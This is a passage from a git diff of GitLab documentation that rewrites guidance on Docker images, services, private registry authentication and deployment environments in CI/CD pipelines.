| Required | GitLab version | Description | -|------------|----------|----------------| ----------- | -| `name` | yes, when used with any other option | 9.4 |Full name of the image to use. It should contain the Registry part if needed. | -| `entrypoint` | no | 9.4 |Command or script to execute as the container's entrypoint. It's translated to Docker's `--entrypoint` option while creating the container. The syntax is similar to [`Dockerfile`'s `ENTRYPOINT`](https://docs.docker.com/engine/reference/builder/#entrypoint) directive, where each shell token is a separate string in the array. | - -### Available settings for `services` - -> Introduced in GitLab and GitLab Runner 9.4. - -| Setting | Required | GitLab version | Description | -|------------|----------|----------------| ----------- | -| `name` | yes, when used with any other option | 9.4 | Full name of the image to use. It should contain the Registry part if needed. | -| `entrypoint` | no | 9.4 |Command or script to execute as the container's entrypoint. It's translated to Docker's `--entrypoint` option while creating the container. The syntax is similar to [`Dockerfile`'s `ENTRYPOINT`](https://docs.docker.com/engine/reference/builder/#entrypoint) directive, where each shell token is a separate string in the array. | -| `command` | no | 9.4 |Command or script that should be used as the container's command. It's translated to arguments passed to Docker after the image's name. The syntax is similar to [`Dockerfile`'s `CMD`](https://docs.docker.com/engine/reference/builder/#cmd) directive, where each shell token is a separate string in the array. | -| `alias` (1) | no | 9.4 |Additional alias that can be used to access the service from the job's container. Read [Accessing the services](#accessing-the-services) for more information. | - -(1) Alias support for the Kubernetes executor was [introduced](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/2229) in GitLab Runner 12.8, and is only available for Kubernetes version 1.7 or later. - -### Starting multiple services from the same image - -> Introduced in GitLab and GitLab Runner 9.4. Read more about the [extended configuration options](#extended-docker-configuration-options). - -Before the new extended Docker configuration options, the following configuration -would not work properly: - -```yaml -services: - - mysql:latest - - mysql:latest -``` - -The runner would start two containers, each that uses the `mysql:latest` image. -However, both of them would be added to the job's container with the `mysql` alias, based on -the [default hostname naming](#accessing-the-services). This would end with one -of the services not being accessible. - -After the new extended Docker configuration options, the above example would -look like: - -```yaml -services: - - name: mysql:latest - alias: mysql-1 - - name: mysql:latest - alias: mysql-2 -``` - -The runner still starts two containers using the `mysql:latest` image, -however now each of them are also accessible with the alias configured -in `.gitlab-ci.yml` file. - -### Setting a command for the service - -> Introduced in GitLab and GitLab Runner 9.4. Read more about the [extended configuration options](#extended-docker-configuration-options). - -Let's assume you have a `super/sql:latest` image with some SQL database -in it. You would like to use it as a service for your job. Let's also -assume that this image does not start the database process while starting -the container. The user needs to manually use `/usr/bin/super-sql run` as -a command to start the database. - -Before the new extended Docker configuration options, you would need to: - -- Create your own image based on the `super/sql:latest` image. -- Add the default command. -- Use the image in the job's configuration: - - ```dockerfile - # my-super-sql:latest image's Dockerfile + ```yaml + image: "registry.example.com/my/image:latest" - FROM super/sql:latest - CMD ["/usr/bin/super-sql", "run"] + services: + - postgresql:9.4 + - redis:latest ``` +- A map for `image` and `services`. The `image:name` is + required: + ```yaml - # .gitlab-ci.yml + image: + name: "registry.example.com/my/image:latest" services: - - my-super-sql:latest + - name: postgresql:9.4 + - name: redis:latest ``` -After the new extended Docker configuration options, you can -set a `command` in the `.gitlab-ci.yml` file instead: - -```yaml -# .gitlab-ci.yml +### Available settings for `image` -services: - - name: super/sql:latest - command: ["/usr/bin/super-sql", "run"] -``` +> Introduced in GitLab and GitLab Runner 9.4. -The syntax of `command` is similar to [Dockerfile's `CMD`](https://docs.docker.com/engine/reference/builder/#cmd). +| Setting | Required | Description | +|------------|----------| ----------- | +| `name` | Yes, when used with any other option. | Full name of the image. It should contain the registry part if needed. | +| `entrypoint` | No. | Command or script to execute as the container's entrypoint. It's translated to Docker's `--entrypoint` option while creating the container. The syntax is similar to [`Dockerfile`'s `ENTRYPOINT`](https://docs.docker.com/engine/reference/builder/#entrypoint) directive, where each shell token is a separate string in the array. | ### Overriding the entrypoint of an image -> Introduced in GitLab and GitLab Runner 9.4. Read more about the [extended configuration options](#extended-docker-configuration-options). +> Introduced in GitLab and GitLab Runner 9.4. Read more about the [extended configuration options](../docker/using_docker_images.md#extended-docker-configuration-options). -Before showing the available entrypoint override methods, let's describe +Before explaining the available entrypoint override methods, let's describe how the runner starts. It uses a Docker image for the containers used in the CI/CD jobs: -1. The runner starts a Docker container using the defined entrypoint (default - from `Dockerfile` that may be overridden in `.gitlab-ci.yml`) +1. The runner starts a Docker container using the defined entrypoint. The default + from `Dockerfile` that may be overridden in the `.gitlab-ci.yml` file. 1. The runner attaches itself to a running container. 1. The runner prepares a script (the combination of [`before_script`](../yaml/README.md#before_script), @@ -457,14 +155,13 @@ CI/CD jobs: 1. The runner sends the script to the container's shell `stdin` and receives the output. -To override the entrypoint of a Docker image, you should -define an empty `entrypoint` in `.gitlab-ci.yml`, so the runner does not start -a useless shell layer. However, that does not work for all Docker versions, and -you should check which one your runner is using: +To override the entrypoint of a Docker image, +define an empty `entrypoint` in the `.gitlab-ci.yml` file, so the runner does not start +a useless shell layer. However, that does not work for all Docker versions. -- _If Docker 17.06 or later is used,_ the `entrypoint` can be set to an empty value. -- _If Docker 17.03 or previous versions are used,_ the `entrypoint` can be set to - `/bin/sh -c`, `/bin/bash -c` or an equivalent shell available in the image. +- For Docker 17.06 and later, the `entrypoint` can be set to an empty value. +- For Docker 17.03 and earlier, the `entrypoint` can be set to + `/bin/sh -c`, `/bin/bash -c`, or an equivalent shell available in the image. The syntax of `image:entrypoint` is similar to [Dockerfile's `ENTRYPOINT`](https://docs.docker.com/engine/reference/builder/#entrypoint). @@ -484,7 +181,7 @@ With the extended Docker configuration options, instead of: You can now define an `entrypoint` in the `.gitlab-ci.yml` file. -**For Docker 17.06+:** +**For Docker 17.06 and later:** ```yaml image: @@ -492,7 +189,7 @@ image: entrypoint: [""] ``` -**For Docker =< 17.03:** +**For Docker 17.03 and earlier:** ```yaml image: @@ -517,40 +214,38 @@ that runner. To access private container registries, the GitLab Runner process can use: -- [Statically defined credentials](#using-statically-defined-credentials). That is, a username and password for a specific registry. -- [Credentials Store](#using-credentials-store). For more information, read [the relevant Docker documentation](https://docs.docker.com/engine/reference/commandline/login/#credentials-store). -- [Credential Helpers](#using-credential-helpers). For more information, read [the relevant Docker documentation](https://docs.docker.com/engine/reference/commandline/login/#credential-helpers). +- [Statically defined credentials](#use-statically-defined-credentials). That is, a username and password for a specific registry. +- [Credentials Store](#use-a-credentials-store). For more information, see [the relevant Docker documentation](https://docs.docker.com/engine/reference/commandline/login/#credentials-store). +- [Credential Helpers](#use-credential-helpers). For more information, see [the relevant Docker documentation](https://docs.docker.com/engine/reference/commandline/login/#credential-helpers). -To define which should be used, the GitLab Runner process reads the configuration in the following order: +To define which option should be used, the runner process reads the configuration in this order: -- `DOCKER_AUTH_CONFIG` variable provided as either: - - A [CI/CD variable](../variables/README.md) in `.gitlab-ci.yml`. - - A project's variables stored on the projects **Settings > CI/CD** page. -- `DOCKER_AUTH_CONFIG` variable provided as environment variable in `config.toml` of the runner. -- `config.json` file placed in `$HOME/.docker` directory of the user running GitLab Runner process. - If the `--user` flag is provided to run the GitLab Runner child processes as unprivileged user, - the home directory of the main GitLab Runner process user is used. +- A `DOCKER_AUTH_CONFIG` variable provided as either: + - A [CI/CD variable](../variables/README.md) in the `.gitlab-ci.yml` file. + - A project's variables stored on the project's **Settings > CI/CD** page. +- A `DOCKER_AUTH_CONFIG` variable provided as environment variable in the runner's `config.toml` file. +- A `config.json` file in `$HOME/.docker` directory of the user running the process. + If the `--user` flag is provided to run the child processes as unprivileged user, + the home directory of the main runner process user is used. -GitLab Runner reads this configuration **only** from `config.toml` and ignores it if -it's provided as an environment variable. This is because GitLab Runner uses **only** -`config.toml` configuration and does not interpolate **any** environment variables at +The runner reads this configuration **only** from the `config.toml` file and ignores it if +it's provided as a CI/CD variable. This is because the runner uses **only** +`config.toml` configuration and does not interpolate **any** CI/CD variables at runtime. ### Requirements and limitations -- This feature requires GitLab Runner **1.8** or higher. -- For GitLab Runner versions **>= 0.6, <1.8** there was a partial - support for using private registries, which required manual configuration - of credentials on runner's host. We recommend to upgrade your runner to - at least version **1.8** if you want to use private registries. - Available for [Kubernetes executor](https://docs.gitlab.com/runner/executors/kubernetes.html) in GitLab Runner 13.1 and later. -- [Credentials Store](#using-credentials-store) and [Credential Helpers](#using-credential-helpers) require binaries to be added to the GitLab Runner's `$PATH`, and require access to do so. Therefore, these features are not available on shared runners, or any other runner where the user does not have access to the environment where the runner is installed. +- [Credentials Store](#use-a-credentials-store) and [Credential Helpers](#use-credential-helpers) + require binaries to be added to the GitLab Runner `$PATH`, and require access to do so. Therefore, + these features are not available on shared runners, or any other runner where the user does not + have access to the environment where the runner is installed. -### Using statically-defined credentials +### Use statically-defined credentials -There are two approaches that you can take in order to access a -private registry. Both require setting the environment variable +There are two approaches that you can take to access a +private registry. Both require setting the CI/CD variable `DOCKER_AUTH_CONFIG` with appropriate authentication information. 1. Per-job: To configure one job to access a private registry, add @@ -561,7 +256,7 @@ private registry. Both require setting the environment variable See below for examples of each. -#### Determining your `DOCKER_AUTH_CONFIG` data +#### Determine your `DOCKER_AUTH_CONFIG` data As an example, let's assume you want to use the `registry.example.com:5000/private/image:latest` image. This image is private and requires you to sign in to a private container @@ -592,7 +287,7 @@ Use one of the following methods to determine the value of `DOCKER_AUTH_CONFIG`: docker logout registry.example.com:5000 ``` -- In some setups, it's possible that Docker client uses the available system key +- In some setups, it's possible the Docker client uses the available system key store to store the result of `docker login`. In that case, it's impossible to read `~/.docker/config.json`, so you must prepare the required base64-encoded version of `${username}:${password}` and create the Docker @@ -618,7 +313,7 @@ Use one of the following methods to determine the value of `DOCKER_AUTH_CONFIG`: } ``` -#### Configuring a job +#### Configure a job To configure a single job with access for `registry.example.com:5000`, follow these steps: @@ -637,7 +332,7 @@ follow these steps: ``` 1. You can now use any private image from `registry.example.com:5000` defined in - `image` and/or `services` in your `.gitlab-ci.yml` file: + `image` or `services` in your `.gitlab-ci.yml` file: ```yaml image: registry.example.com:5000/namespace/image:tag @@ -651,19 +346,19 @@ registries to the `"auths"` hash as described above. The full `hostname:port` combination is required everywhere for the runner to match the `DOCKER_AUTH_CONFIG`. For example, if -`registry.example.com:5000/namespace/image:tag` is specified in `.gitlab-ci.yml`, +`registry.example.com:5000/namespace/image:tag` is specified in the `.gitlab-ci.yml` file, then the `DOCKER_AUTH_CONFIG` must also specify `registry.example.com:5000`. Specifying only `registry.example.com` does not work. ### Configuring a runner -If you have many pipelines that access the same registry, it is -probably better to set up registry access at the runner level. This +If you have many pipelines that access the same registry, you should +set up registry access at the runner level. This allows pipeline authors to have access to a private registry just by -running a job on the appropriate runner. It also makes registry -changes and credential rotations much simpler. +running a job on the appropriate runner. It also helps simplify registry +changes and credential rotations. -Of course this means that any job on that runner can access the +This means that any job on that runner can access the registry with the same privilege, even across projects. If you need to control access to the registry, you need to be sure to control access to the runner. @@ -686,14 +381,12 @@ To add `DOCKER_AUTH_CONFIG` to a runner: 1. Restart the runner service. -### Using Credentials Store - -> Support for using Credentials Store was added in GitLab Runner 9.5. +### Use a Credentials Store -To configure credentials store, follow these steps: +To configure a Credentials Store: -1. To use a credentials store, you need an external helper program to interact with a specific keychain or external store. - Make sure the helper program is available in GitLab Runner `$PATH`. +1. To use a Credentials Store, you need an external helper program to interact with a specific keychain or external store. + Make sure the helper program is available in the GitLab Runner `$PATH`. 1. Make GitLab Runner use it. There are two ways to accomplish this. Either: @@ -716,16 +409,16 @@ To configure credentials store, follow these steps: If you use both images from a private registry and public images from Docker Hub, pulling from Docker Hub fails. Docker daemon tries to use the same credentials for **all** the registries. -### Using Credential Helpers +### Use Credential Helpers -> Support for using Credential Helpers was added in GitLab Runner 12.0 +> Introduced in GitLab Runner 12.0. As an example, let's assume that you want to use the `aws_account_id.dkr.ecr.region.amazonaws.com/private/image:latest` image. This image is private and requires you to log in into a private container registry. To configure access for `aws_account_id.dkr.ecr.region.amazonaws.com`, follow these steps: -1. Make sure `docker-credential-ecr-login` is available in GitLab Runner's `$PATH`. +1. Make sure `docker-credential-ecr-login` is available in the GitLab Runner `$PATH`. 1. Have any of the following [AWS credentials setup](https://github.com/awslabs/amazon-ecr-credential-helper#aws-credentials). Make sure that GitLab Runner can access the credentials. 1. Make GitLab Runner use it. There are two ways to accomplish this. Either: @@ -742,9 +435,9 @@ To configure access for `aws_account_id.dkr.ecr.region.amazonaws.com`, follow th } ``` - This configures Docker to use the credential helper for a specific registry. + This configures Docker to use the Credential Helper for a specific registry. - or + Instead, you can configure Docker to use the Credential Helper for all Amazon Elastic Container Registry (ECR) registries: ```json { @@ -752,10 +445,8 @@ To configure access for `aws_account_id.dkr.ecr.region.amazonaws.com`, follow th } ``` - This configures Docker to use the credential helper for all Amazon Elastic Container Registry (ECR) registries. - - Or, if you're running self-managed runners, - add the above JSON to `${GITLAB_RUNNER_HOME}/.docker/config.json`. + add the previous JSON to `${GITLAB_RUNNER_HOME}/.docker/config.json`. GitLab Runner reads this configuration file and uses the needed helper for this specific repository. @@ -766,101 +457,8 @@ To configure access for `aws_account_id.dkr.ecr.region.amazonaws.com`, follow th image: aws_account_id.dkr.ecr.region.amazonaws.com/private/image:latest ``` - In the example above, GitLab Runner looks at `aws_account_id.dkr.ecr.region.amazonaws.com` for the + In the example, GitLab Runner looks at `aws_account_id.dkr.ecr.region.amazonaws.com` for the image `private/image:latest`. You can add configuration for as many registries as you want, adding more -registries to the `"credHelpers"` hash as described above. - -## Configuring services - -Many services accept environment variables, which you can use to change -database names or set account names, depending on the environment. - -GitLab Runner 0.5.0 and up passes all YAML-defined CI/CD variables to the created -service containers. - -For all possible configuration variables, check the documentation of each image -provided in their corresponding Docker hub page. - -All CI/CD variables are passed to all services containers. It's not -designed to distinguish which variable should go where. - -### PostgreSQL service example - -Read the specific documentation for -[using PostgreSQL as a service](../services/postgres.md). - -### MySQL service example - -Read the specific documentation for -[using MySQL as a service](../services/mysql.md). - -## How Docker integration works - -Below is a high level overview of the steps performed by Docker during job -time. - -1. Create any service container: `mysql`, `postgresql`, `mongodb`, `redis`. -1. Create a cache container to store all volumes as defined in `config.toml` and - `Dockerfile` of build image (`ruby:2.6` as in above example). -1. Create a build container and link any service container to build container. -1. Start the build container, and send a job script to the container. -1. Run the job script. -1. Checkout code in: `/builds/group-name/project-name/`. -1. Run any step defined in `.gitlab-ci.yml`. -1. Check the exit status of build script. -1. Remove the build container and all created service containers. - -## How to debug a job locally - -The following commands are run without root privileges. You should be -able to run Docker with your regular user account. - -First start with creating a file named `build_script`: - -```shell -cat <<EOF > build_script -git clone https://gitlab.com/gitlab-org/gitlab-runner.git /builds/gitlab-org/gitlab-runner -cd /builds/gitlab-org/gitlab-runner -make -EOF -``` - -Here we use as an example the GitLab Runner repository which contains a -Makefile, so running `make` executes the commands defined in the Makefile. -Instead of `make`, you could run the command which is specific to your project. - -Then create some service containers: - -```shell -docker run -d --name service-mysql mysql:latest -docker run -d --name service-postgres postgres:latest -``` - -This creates two service containers, named `service-mysql` and -`service-postgres` which use the latest MySQL and PostgreSQL images -respectively. They both run in the background (`-d`). - -Finally, create a build container by executing the `build_script` file we -created earlier: - -```shell -docker run --name build -i --link=service-mysql:mysql --link=service-postgres:postgres ruby:2.6 /bin/bash < build_script -``` - -The above command creates a container named `build` that's spawned from -the `ruby:2.6` image and has two services linked to it. The `build_script` is -piped using `stdin` to the bash interpreter which in turn executes the -`build_script` in the `build` container. - -When you finish testing and no longer need the containers, you can remove them -with: - -```shell -docker rm -f -v build service-mysql service-postgres -``` - -This forcefully (`-f`) removes the `build` container, the two service -containers, and all volumes (`-v`) that were created with the container -creation. +registries to the `"credHelpers"` hash. diff --git a/doc/ci/environments/deployment_safety.md b/doc/ci/environments/deployment_safety.md index 358117ed796..e38d9031ffd 100644 --- a/doc/ci/environments/deployment_safety.md +++ b/doc/ci/environments/deployment_safety.md @@ -110,7 +110,7 @@ for an explanation of these roles and the permissions of each. Production secrets are needed to deploy successfully. For example, when deploying to the cloud, cloud providers require these secrets to connect to their services. In the project settings, you can -define and protect CI/CD variables for these secrets. [Protected variables](../variables/README.md#protect-a-custom-variable) +define and protect CI/CD variables for these secrets. [Protected variables](../variables/README.md#protect-a-cicd-variable) are only passed to pipelines running on [protected branches](../../user/project/protected_branches.md) or [protected tags](../../user/project/protected_tags.md). The other pipelines don't get the protected variable. You can also diff --git a/doc/ci/environments/environments_dashboard.md b/doc/ci/environments/environments_dashboard.md index ef222ba5779..4ee9aa9a5ba 100644 --- a/doc/ci/environments/environments_dashboard.md +++ b/doc/ci/environments/environments_dashboard.md @@ -17,7 +17,7 @@ from development to staging, and then to production (or through any series of custom environment flows you can set up). With an at-a-glance view of multiple projects, you can instantly see which pipelines are green and which are red allowing you to -diagnose if there is a block at a particular point, or if there’s +diagnose if there is a block at a particular point, or if there's a more systemic problem you need to investigate. You can access the dashboard from the top bar by clicking diff --git a/doc/ci/environments/img/environment_auto_stop_v13_10.png b/doc/ci/environments/img/environment_auto_stop_v13_10.png Binary files differindex 1525f670ff2..50f268da27f 100644 --- a/doc/ci/environments/img/environment_auto_stop_v13_10.png +++ b/doc/ci/environments/img/environment_auto_stop_v13_10.png diff --git a/doc/ci/environments/img/environments_dynamic_groups_v13_10.png b/doc/ci/environments/img/environments_dynamic_groups_v13_10.png Binary files differindex cf3f9f7c781..c17d75a0912 100644 --- a/doc/ci/environments/img/environments_dynamic_groups_v13_10.png +++ b/doc/ci/environments/img/environments_dynamic_groups_v13_10.png diff --git a/doc/ci/environments/img/environments_terminal_button_on_index_v13_10.png b/doc/ci/environments/img/environments_terminal_button_on_index_v13_10.png Binary files differindex 13c8d1cd523..4a9a4e65d00 100644 --- a/doc/ci/environments/img/environments_terminal_button_on_index_v13_10.png +++ b/doc/ci/environments/img/environments_terminal_button_on_index_v13_10.png diff --git a/doc/ci/environments/img/environments_terminal_button_on_show_v13_10.png b/doc/ci/environments/img/environments_terminal_button_on_show_v13_10.png Binary files differindex fcc3e2b6631..e725720846a 100644 --- a/doc/ci/environments/img/environments_terminal_button_on_show_v13_10.png +++ b/doc/ci/environments/img/environments_terminal_button_on_show_v13_10.png diff --git a/doc/ci/environments/index.md b/doc/ci/environments/index.md index abb12852fac..55d83887423 100644 --- a/doc/ci/environments/index.md +++ b/doc/ci/environments/index.md @@ -6,9 +6,7 @@ type: reference disqus_identifier: 'https://docs.gitlab.com/ee/ci/environments.html' --- -# Environments and deployments - -> Introduced in GitLab 8.9. +# Environments and deployments **(FREE)** Environments describe where code is deployed. @@ -123,29 +121,28 @@ Some variables cannot be used as environment names or URLs. For more information about the `environment` keywords, see [the `.gitlab-ci.yml` keyword reference](../yaml/README.md#environment). -## Deployment tier of environments (**FREE**) +## Deployment tier of environments > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/300741) in GitLab 13.10. -There are cases where you might want to use a code name as an environment name instead of using -an [industry standard](https://en.wikipedia.org/wiki/Deployment_environment). For example, your environment might be called `customer-portal` instead of `production`. -This is perfectly fine, however, it loses information that the specific -environment is used as production. +Sometimes, instead of using an [industry standard](https://en.wikipedia.org/wiki/Deployment_environment) +environment name, like `production`, you might want to use a code name, like `customer-portal`. +While there is no technical reason not to use a name like `customer-portal`, the name +no longer indicates that the environment is used for production. -To keep information that a specific environment is for production or -some other use, you can set one of the following tiers to each environment: +To indicate that a specific environment is for a specific use, +you can use tiers: -| Environment tier | Environment names examples | -| ---- | -------- | -| `production` | Production, Live | -| `staging` | Staging, Model, Pre, Demo | -| `testing` | Test, QC | -| `development` | Dev, [Review apps](../review_apps/index.md), Trunk | -| `other` | | +| Environment tier | Environment name examples | +|------------------|----------------------------------------------------| +| `production` | Production, Live | +| `staging` | Staging, Model, Pre, Demo | +| `testing` | Test, QC | +| `development` | Dev, [Review apps](../review_apps/index.md), Trunk | +| `other` | | -By default, an approximate tier is automatically guessed and set from [the environment name](../yaml/README.md#environmentname). -Alternatively, you can specify a specific tier with `deployment_tier` keyword, -see the [`.gitlab-ci.yml` syntax reference](../yaml/README.md#environmentdeployment_tier) for more details. +By default, GitLab assumes a tier based on [the environment name](../yaml/README.md#environmentname). +Instead, you can use the [`deployment_tier` keyword](../yaml/README.md#environmentdeployment_tier) to specify a tier. ## Configure manual deployments @@ -208,8 +205,8 @@ deploy: ``` When you use the GitLab Kubernetes integration to deploy to a Kubernetes cluster, -cluster and namespace information is displayed above the job -trace on the deployment job page: +you can view cluster and namespace information. On the deployment +job page, it's displayed above the job trace:  @@ -253,7 +250,7 @@ GitLab supports the [dotenv (`.env`)](https://github.com/bkeepers/dotenv) file f and expands the `environment:url` value with variables defined in the `.env` file. To use this feature, specify the -[`artifacts:reports:dotenv`](../pipelines/job_artifacts.md#artifactsreportsdotenv) keyword in `.gitlab-ci.yml`. +[`artifacts:reports:dotenv`](../yaml/README.md#artifactsreportsdotenv) keyword in `.gitlab-ci.yml`. <i class="fa fa-youtube-play youtube" aria-hidden="true"></i> For an overview, see [Set dynamic URLs after a job finished](https://youtu.be/70jDXtOf4Ig). @@ -261,7 +258,7 @@ For an overview, see [Set dynamic URLs after a job finished](https://youtu.be/70 ### Example of setting dynamic environment URLs The following example shows a Review App that creates a new environment -per merge request. The `review` job is triggered by every push, and +for each merge request. The `review` job is triggered by every push, and creates or updates an environment named `review/your-branch-name`. The environment URL is set to `$DYNAMIC_ENVIRONMENT_URL`: @@ -349,7 +346,7 @@ places in GitLab: You can see this information in a merge request if: -- The merge request is eventually merged to the default branch (usually `master`). +- The merge request is eventually merged to the default branch (usually `main`). - That branch also deploys to an environment (for example, `staging` or `production`). For example: @@ -377,13 +374,7 @@ deleted. You can configure environments to stop when a branch is deleted. The following example shows a `deploy_review` job that calls a `stop_review` job -to clean up and stop the environment. The `stop_review` job must be in the same -`stage` as the `deploy_review` job. - -Both jobs must have the same [`rules`](../yaml/README.md#onlyexcept-basic) -or [`only/except`](../yaml/README.md#onlyexcept-basic) configuration. Otherwise, -the `stop_review` job might not be included in all pipelines that include the -`deploy_review` job, and you cannot trigger `action: stop` to stop the environment automatically. +to clean up and stop the environment. ```yaml deploy_review: @@ -409,6 +400,14 @@ stop_review: when: manual ``` +Both jobs must have the same [`rules`](../yaml/README.md#onlyexcept-basic) +or [`only/except`](../yaml/README.md#onlyexcept-basic) configuration. Otherwise, +the `stop_review` job might not be included in all pipelines that include the +`deploy_review` job, and you cannot trigger `action: stop` to stop the environment automatically. + +The job with [`action: stop` might not run](#the-job-with-action-stop-doesnt-run) +if it's in a later stage than the job that started the environment. + If you can't use [pipelines for merge requests](../merge_request_pipelines/index.md), set the [`GIT_STRATEGY`](../runners/README.md#git-strategy) to `none` in the `stop_review` job. Then the [runner](https://docs.gitlab.com/runner/) doesn't @@ -430,7 +429,7 @@ Due to resource limitations, a background worker for stopping environments only every hour. This means that environments aren't stopped at the exact timestamp specified, but are instead stopped when the hourly cron worker detects expired environments. -In the following example, each merge request creates a new Review App environment. +In the following example, each merge request creates a Review App environment. Each push triggers the `review_app` job and an environment named `review/your-branch-name` is created or updated. The environment runs until `stop_review_app` is executed: @@ -477,7 +476,7 @@ You can manually override a deployment's expiration date. 1. Go to the project's **Operations > Environments** page. 1. Select the deployment name. -1. In the top right, select the thumbtack (**{thumbtack}**). +1. On the top right, select the thumbtack (**{thumbtack}**).  @@ -497,19 +496,17 @@ To delete a stopped environment in the GitLab UI: 1. Next to the environment you want to delete, select **Delete environment**. 1. On the confirmation dialog box, select **Delete environment**. -### Prepare an environment +### Prepare an environment without creating a deployment > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/208655) in GitLab 13.2. -By default, GitLab creates a deployment every time a -build with the specified environment runs. Newer deployments can also -[cancel older ones](deployment_safety.md#skip-outdated-deployment-jobs). +By default, when GitLab CI/CD runs a job for a specific environment, it +triggers a deployment and [(optionally) cancels outdated +deployments](deployment_safety.md#ensure-only-one-deployment-job-runs-at-a-time). -You may want to specify an environment keyword to -[protect builds from unauthorized access](protected_environments.md), or to get -access to [environment-scoped variables](#scoping-environments-with-specs). In these cases, -you can use the `action: prepare` keyword to ensure deployments aren't created, -and no builds are canceled: +To use an environment without creating a new deployment, and without +cancelling outdated deployments, append the keyword `action: prepare` to your +job: ```yaml build: @@ -522,9 +519,10 @@ build: url: https://staging.example.com ``` -### Group similar environments +This gives you access to [environment-scoped variables](#scoping-environments-with-specs), +and can be used to [protect builds from unauthorized access](protected_environments.md). -> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/7015) in GitLab 8.14. +### Group similar environments You can group environments into collapsible sections in the UI. @@ -547,10 +545,9 @@ deploy_review: ### Environment incident management -You have successfully setup a Continuous Delivery/Deployment workflow in your project. Production environments can go down unexpectedly, including for reasons outside -of your own control. For example, issues with external dependencies, infrastructure, -or human error can cause major issues with an environment. This could include: +of your control. For example, issues with external dependencies, infrastructure, +or human error can cause major issues with an environment. Things like: - A dependent cloud service goes down. - A 3rd party library is updated and it's not compatible with your application. @@ -572,7 +569,7 @@ severity is shown, so you can identify which environments need immediate attenti  When the issue that triggered the alert is resolved, it is removed and is no -longer visible on the environment page. +longer visible on the environments page. If the alert requires a [rollback](#retry-or-roll-back-a-deployment), you can select the deployment tab from the environment page and select which deployment to roll back to. @@ -584,7 +581,7 @@ deployment tab from the environment page and select which deployment to roll bac In a typical Continuous Deployment workflow, the CI pipeline tests every commit before deploying to production. However, problematic code can still make it to production. For example, inefficient code that is logically correct can pass tests even though it causes severe performance degradation. -Operators and SREs monitor the system to catch such problems as soon as possible. If they find a +Operators and SREs monitor the system to catch these problems as soon as possible. If they find a problematic deployment, they can roll back to a previous stable version. GitLab Auto Rollback eases this workflow by automatically triggering a rollback when a @@ -599,54 +596,49 @@ Limitations of GitLab Auto Rollback: GitLab Auto Rollback is turned off by default. To turn it on: -1. Visit **Project > Settings > CI/CD > Automatic deployment rollbacks**. +1. Go to **Project > Settings > CI/CD > Automatic deployment rollbacks**. 1. Select the checkbox for **Enable automatic rollbacks**. -1. Click **Save changes**. +1. Select **Save changes**. ### Monitoring environments -If you have enabled [Prometheus for monitoring system and response metrics](../../user/project/integrations/prometheus.md), -you can monitor the behavior of your app running in each environment. For the monitoring -dashboard to appear, you need to Configure Prometheus to collect at least one +To monitor the behavior of your app as it runs in each environment, +enable [Prometheus for monitoring system and response metrics](../../user/project/integrations/prometheus.md). +For the monitoring dashboard to appear, configure Prometheus to collect at least one [supported metric](../../user/project/integrations/prometheus_library/index.md). -In GitLab 9.2 and later, all deployments to an environment are shown directly on the monitoring dashboard. +All deployments to an environment are shown on the monitoring dashboard. +You can view changes in performance for each version of your application. -Once configured, GitLab attempts to retrieve [supported performance metrics](../../user/project/integrations/prometheus_library/index.md) +GitLab attempts to retrieve [supported performance metrics](../../user/project/integrations/prometheus_library/index.md) for any environment that has had a successful deployment. If monitoring data was successfully retrieved, a **Monitoring** button appears for each environment. -Clicking the **Monitoring** button displays a new page showing up to the last -8 hours of performance data. It may take a minute or two for data to appear -after initial deployment. - -All deployments to an environment are shown directly on the monitoring dashboard, -which allows easy correlation between any changes in performance and new -versions of the app, all without leaving GitLab. +To view the last eight hours of performance data, select the **Monitoring** button. +It may take a minute or two for data to appear after initial deployment.  #### Embedding metrics in GitLab Flavored Markdown -Metric charts can be embedded within GitLab Flavored Markdown. See [Embedding Metrics within GitLab Flavored Markdown](../../operations/metrics/embed.md) for more details. +Metric charts can be embedded in GitLab Flavored Markdown. See [Embedding Metrics in GitLab Flavored Markdown](../../operations/metrics/embed.md) for more details. ### Web terminals -> Web terminals were added in GitLab 8.15 and are only available to project Maintainers and Owners. - If you deploy to your environments with the help of a deployment service (for example, the [Kubernetes integration](../../user/project/clusters/index.md)), GitLab can open -a terminal session to your environment. +a terminal session to your environment. You can then debug issues without leaving your web browser. -This is a powerful feature that allows you to debug issues without leaving the comfort -of your web browser. To enable it, follow the instructions given in the service integration -documentation. +The Web terminal is a container-based deployment, which often lack basic tools (like an editor), +and can be stopped or restarted at any time. If this happens, you lose all your +changes. Treat the Web terminal as a debugging tool, not a comprehensive online IDE. -Note that container-based deployments often lack basic tools (like an editor), and may -be stopped or restarted at any time. If this happens, you lose all your -changes. Treat this as a debugging tool, not a comprehensive online IDE. +Web terminals: -Once enabled, your environments display a **Terminal** button: +- Are available to project Maintainers and Owners only. +- Must [be enabled](../../administration/integration/terminal.md). + +In the UI, you can view the Web terminal by selecting a **Terminal** button:  @@ -654,8 +646,7 @@ You can also access the terminal button from the page for a specific environment  -Wherever you find it, clicking the button takes you to a separate page to -establish the terminal session: +Select the button to establish the terminal session:  @@ -664,14 +655,14 @@ by your deployment so you can: - Run shell commands and get responses in real time. - Check the logs. -- Try out configuration or code tweaks etc. +- Try out configuration or code tweaks. -You can open multiple terminals to the same environment, they each get their own shell +You can open multiple terminals to the same environment. They each get their own shell session and even a multiplexer like `screen` or `tmux`. ### Check out deployments locally -In GitLab 8.13 and later, a reference in the Git repository is saved for each deployment, so +A reference in the Git repository is saved for each deployment, so knowing the state of your current environments is only a `git fetch` away. In your Git configuration, append the `[remote "<your-remote>"]` block with an extra @@ -688,24 +679,23 @@ fetch = +refs/environments/*:refs/remotes/origin/environments/* You can limit the environment scope of a CI/CD variable by defining which environments it can be available for. +For example, if the environment scope is `production`, then only the jobs +with the environment `production` defined would have this specific variable. -Wildcards can be used and the default environment scope is `*`. This means that -any jobs can have this variable regardless of whether an environment is defined. +The default environment scope is a wildcard (`*`), which means that +any job can have this variable, regardless of whether an environment is defined. -For example, if the environment scope is `production`, then only the jobs -having the environment `production` defined would have this specific variable. -Wildcards (`*`) can be used along with the environment name, therefore if the -environment scope is `review/*` then any jobs with environment names starting -with `review/` would have that particular variable. +If the environment scope is `review/*`, then jobs with environment names starting +with `review/` would have that variable available. Some GitLab features can behave differently for each environment. For example, you can -[create a secret variable to be injected only into a production 